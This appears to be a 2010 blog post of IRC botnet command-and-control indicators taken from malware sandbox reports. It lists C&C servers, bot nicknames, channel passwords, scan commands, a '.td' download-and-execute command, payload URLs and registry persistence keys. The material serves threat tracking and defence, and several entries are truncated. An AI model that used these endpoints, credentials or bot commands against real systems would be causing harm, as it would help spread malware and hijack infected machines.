Month: February 2010

entranessaonda.com

entranessaonda.com 64.32.27.135 Opened listening TCP connection on port: 35549 * C&C Server: 64.32.27.135:6667 * Server Password: * Username: cvvfqi * Nickname: L2-cx6i * Channel: #ceara (Password: ) * Channeltopic: :.scan 75 1 189.42.x.x 2 1 189.42.x.x

irc.gizemdolu.net

irc.gizemdolu.net 213.229.82.141 Opened listening TCP connection on port: 113 * C&C Server: 213.229.82.141:6667 * Server Password: * Username: jmlleo * Nickname: deZ-81849 * Channel: #ri0t (Password: milf) * Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Task manager” = taskmngr.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices “Task manager” = taskmngr.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Task manager” = taskmngr.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “EnableDCOM”

irc.ppoeconx.com

69.245.107.191 (6667) chanels:##im;#Q Invisible Users: 330 Operators: 1 operator(s) online Channels: 8 channels formed Clients: I have 358 clients and 0 servers Local users: Current Local Users: 358 Max: 435 Global users: Current Global Users: 358 Max: 390

Srv2.0wn3d.3u(ms0608 exploit)

scheck.sytes.net scheck.sytes.net 208.51.78.252 ferroclubchile.cl ferroclubchile.cl 200.72.160.252 UDP Connections Remote IP Address: 127.0.0.1 Port: 1037 Send Datagram: 55 packet(s) of size 1 Recv Datagram: 55 packet(s) of size 1 Download URLs http://208.51.78.252/ps.exe (scheck.sytes.net) http://200.72.160.252/img/fam//ps.exe (ferroclubchile.cl) Outgoing connection to remote server: scheck.sytes.net TCP port 80 Outgoing connection to remote server: ferroclubchile.cl TCP port 80 DNS Lookup Host

hub.1282.net

Remote Host Port Number 193.104.27.98 80 218.61.22.10 1863 * The data identified by the following URLs was then requested from the remote web server: o http://193.104.27.98/pizda.php o http://193.104.27.98/fox.bin o http://www.ip-adress.com/ MODE [N00_USA_XP_7947582]8 @ -ix PONG eee.4088.com JOIN #superman open MODE #superman -ix * The following ports were open in the system: Port Protocol Process 1053

flex.sintoniatotal.org

* Unknown Connections o Host By Name: + Requested Host: flex.sintoniatotal.org + Resulting Address: 120.126.19.44 o Connection Established: 0 o Socket: 0 * Outgoing Connections o Transport Protocol: TCP o Remote Address: 120.126.19.44 o Remote Port: 4545 o Connection Established: 0 o Socket: 1752 more here http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=12056277&cs=F7D3B935AA72AC77A9162D505FB6D5EE

h3ll.bounceme.net

Host Name IP Address h3ll.bounceme.net 66.11.238.23 Opened listening TCP connection on port: 34115 * C&C Server: 66.11.238.23:1993 * Server Password: * Username: cxcds * Nickname: L2-|7j8 * Channel: #vncshit# (Password: suckmybigdick) * Channeltopic: :.scan 64 0 y 3 0 58.x.x.x Outgoing connection to remote server: 58.163.0.1 TCP port 5900 Outgoing connection to remote server: 58.163.0.55

bmcash.net

# UDP Connections o DNS Data + Name Server 192.168.1.200 # DNS Package: * ID: $100 * Type: Query * OP Code: Query * Flags: RD * R Code: NoError * QD Count: 1 * AN Count: 0 * NS Count: 0 * AR Count: 0 o Question Section + Question: # Name: bmcash.net #

tshge.mamadody.mobi

tshge.mamadody.mobi 74.117.174.95 * C&C Server: 74.117.174.95:15656 * Server Password: * Username: nn * Nickname: hh[DEU|XP]5178227 * Channel: #t (Password: ) * Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s * C&C Server: 74.117.174.95:15656 * Server Password: * Username: nn * Nickname: [DEU|XP]5665417 * Channel: #t (Password: ) * Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s Registry Changes by

83.140.172.212(Worm.IM.Sohanad)

Remote Host Port Number 64.62.181.46 80 83.140.172.212 6667 * The data identified by the following URL was then requested from the remote web server: o http://h1.ripway.com/sxmast/config.php NICK u-uu6 USER l4 8 * :0.0 PONG :3083554165 JOIN #sxsouls nopass * The following port was open in the system: Port Protocol Process 1056 TCP usx32.exe (%AppData%usx32.exe) Registry